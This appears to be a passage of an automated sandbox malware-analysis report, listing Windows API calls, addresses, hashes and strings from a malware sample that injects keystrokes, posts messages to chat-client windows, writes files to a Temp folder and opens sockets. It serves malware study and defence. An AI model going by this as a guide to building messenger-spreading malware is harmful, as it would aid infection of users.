                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 632107725402047BEF216FA19C49FEF3F29DF05364F044066FD0465192D67D8961C76A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 00420F24
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000C,00000000,?), ref: 00420F6A
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00420F71
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000102,00000062,00000000), ref: 00420F81
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000102,0000006F,00000000), ref: 00420F8C
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000102,0000006F,00000000), ref: 00420F97
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000102,0000006F,00000000), ref: 00420FA2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$ClassFocusName
                                                                                                                                                                                                                                                      • String ID: ChatRichEdit$RichView$a
                                                                                                                                                                                                                                                      • API String ID: 66543796-1598715665
                                                                                                                                                                                                                                                      • Opcode ID: 890044fba2cc44263f37aa3dadf0e84e0db21f0fb8ef6964dd6e8cd6dd443eca
                                                                                                                                                                                                                                                      • Instruction ID: e846d9decd41631cdb4d36d58639d72d19dad4848a72e991b2f40cf8e2b8b0ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 890044fba2cc44263f37aa3dadf0e84e0db21f0fb8ef6964dd6e8cd6dd443eca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8511C6722042187EE721ABA4AC8AFFF7B6CEF45756F00402AF605E1091DFB499818779
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,0042B908,00000001,00000000,00000000,0042B910,00000038,00424B0D,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004245D8
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004245EA
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00424DA1,?,00000000,00000000,0042B910,00000038,00424B0D,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00424671
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,00424DA1,?,?,00000000), ref: 004246F2
                                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0042470C
                                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 00424747
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1775797328-0
                                                                                                                                                                                                                                                      • Opcode ID: 5ebf4d84656ea33a5e16a2db9ec40510f5c82011a8009d03a8aab4f3649bc3b0
                                                                                                                                                                                                                                                      • Instruction ID: 85a83c01b395e37311d7339dc3e0d672865d23556fff4ce5aea98372a6a78dfe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ebf4d84656ea33a5e16a2db9ec40510f5c82011a8009d03a8aab4f3649bc3b0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27B1A272A00169EFCF219FA0EC849EF7B75FF48314F94412AF911A2260D7398DA1DB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 0041CC19
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000080), ref: 0041CC2A
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0041CC33
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041CC4D
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_0001C853,00000000), ref: 0041CC70
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0041CC84
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041CC8F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041CCAB
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020), ref: 0041CCC0
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0041CCC3
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045A330), ref: 0041CCC6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$ClassCriticalCurrentPriorityProcessSection$EnterEnumLeaveWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 45525367-0
                                                                                                                                                                                                                                                      • Opcode ID: 516bb46634a88392868154c87f35b5094bcfaa20d88f085637ad835e6f846c17
                                                                                                                                                                                                                                                      • Instruction ID: e4b7b534546f974815615e0e0b6c2814501736f38d54780cb1c277d08e171287
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 516bb46634a88392868154c87f35b5094bcfaa20d88f085637ad835e6f846c17
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311A3307843449BE7209B74AC89B977B98E716B05F144023E904C23E1E7A9DC95D7EE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 00401CA7
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401CB0
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00401D17
                                                                                                                                                                                                                                                        • Part of subcall function 0041A7A8: lstrlenA.KERNEL32(0045A2D8,?,0000C328,?,0040178B,00000000,00000028,?,?,00000000,00000101,0000C328,?,00000028), ref: 0041A7C3
                                                                                                                                                                                                                                                        • Part of subcall function 0041A7A8: lstrlenA.KERNEL32(0045A2D8,00000000,0040178B,00000000,00000028,?,?,00000000,00000101,0000C328,?,00000028), ref: 0041A7DB
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00401D96
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401DAF
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401DC8
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401DCF
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(004594F3,?,00000041), ref: 00401DE8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00401C9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Filelstrlen$Processlstrcpy$AllocateAttributesCloseCreateFreeHandleWritelstrcpyn
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 1327079956-787714339
                                                                                                                                                                                                                                                      • Opcode ID: fa4d107f609d19dea433b514101a5e20dde18fe9b54f179357f6e7efbd4c01fa
                                                                                                                                                                                                                                                      • Instruction ID: d5914a3fd327b66cc3871d7ac49a2fef2b3f6bd2abb959f0b06e8de4b0a62d0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa4d107f609d19dea433b514101a5e20dde18fe9b54f179357f6e7efbd4c01fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41B172800158BBCF119BE0DC49EEEBB7DEF44301F0000A6FA04BA191DB795B95DB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00414F69
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00414F8F
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00414FB5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00414FB9
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00414FE7
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00415011
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0041503B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InputSend$Sleep
                                                                                                                                                                                                                                                      • String ID: A$C
                                                                                                                                                                                                                                                      • API String ID: 240672775-2418331497
                                                                                                                                                                                                                                                      • Opcode ID: 1c0c436739b32cef76487c2bd2e5609d6edc443ef8b6e8deb309a561d9fd4a74
                                                                                                                                                                                                                                                      • Instruction ID: 4123861c5e773278f22ee70391f25b08959f3197a0c97b594261c59329bae634
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c0c436739b32cef76487c2bd2e5609d6edc443ef8b6e8deb309a561d9fd4a74
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D3101B1D0021CAADB11EBD6DD8AEDFFBBCAF54314F104417F205B6111E27856198B66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 00415649
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00415665
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041566D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004156B6
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004156BE
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004156C9
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A440), ref: 004156E0
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004156E7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$lstrcpy
                                                                                                                                                                                                                                                      • String ID: http:
                                                                                                                                                                                                                                                      • API String ID: 2778582283-838245522
                                                                                                                                                                                                                                                      • Opcode ID: 910bc0edabb0361335896f10289412e27d3a1552bd069adf1f798fb91a7db139
                                                                                                                                                                                                                                                      • Instruction ID: 1031dfbec989802335f12faaa8e25cbdc552db4a7a4cb713b1da852898bd7ad5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 910bc0edabb0361335896f10289412e27d3a1552bd069adf1f798fb91a7db139
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E214931604B41DEEB2556388D087FF7B968FD2314F95406BE04A83362DA6D8CC243EE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0041BC68
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,0000003C), ref: 0041BC86
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000401,00000000,00000201), ref: 0041BCC8
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000401,00000000,00000202), ref: 0041BCD2
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000401,00000000,00000203), ref: 0041BCDE
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000400,00000000,00000201), ref: 0041BCEA
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000400,00000000,00000202), ref: 0041BCF5
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000400,00000000,00000203), ref: 0041BCFC
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(?,?), ref: 00414381
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowTextA.USER32(?,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414401
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowPos.USER32(?,000000FF,?,00000000,00000000,00000000,00000040), ref: 0041441C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414425
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414432
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 0041443B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 0041443E
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414441
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414444
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414447
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: Sleep.KERNEL32(00000064), ref: 0041444B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414454
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessagePost$FocusForegroundShow$Rect$ClassDesktopNameProcessSleepTextThread
                                                                                                                                                                                                                                                      • String ID: tskMainForm.
                                                                                                                                                                                                                                                      • API String ID: 97974782-3792992863
                                                                                                                                                                                                                                                      • Opcode ID: f3728983acd7094c2e4067bc4e95b9245c57164759366f12bb2ebcef9a7df4c4
                                                                                                                                                                                                                                                      • Instruction ID: 1bc88987940958ee28aaea085f43472e5cd030fed38d6eae93376470fb00cc23
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3728983acd7094c2e4067bc4e95b9245c57164759366f12bb2ebcef9a7df4c4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3411A37164030C7BF520A7519CCAF7F7AACEB81B88F40041AFA10A51C1D7DA691586BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 00420E70
                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000C,00000000,004639A9), ref: 00420E97
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000080), ref: 00420EBF
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00420EDD
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,0000000D,00000000), ref: 00420EF3
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000101,0000000D,00000000), ref: 00420EFF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$Post$ClassFocusNameSendTextWindow
                                                                                                                                                                                                                                                      • String ID: Button$Edit$Open
                                                                                                                                                                                                                                                      • API String ID: 1042367570-3097292768
                                                                                                                                                                                                                                                      • Opcode ID: ac45b4f16eb2aefaeb692399b509cc3780b81aec694696ad590f5342b2021abf
                                                                                                                                                                                                                                                      • Instruction ID: 440e0089395b4cd75e24fc35e43af4c9def935b2bcea93b6c4d50534f2a2fce1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac45b4f16eb2aefaeb692399b509cc3780b81aec694696ad590f5342b2021abf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E111EC327443287AEB219760BC46FBB777CEB54710F64006BFA40F51C0DBE9A54146AD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040DCCB
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040DCFD
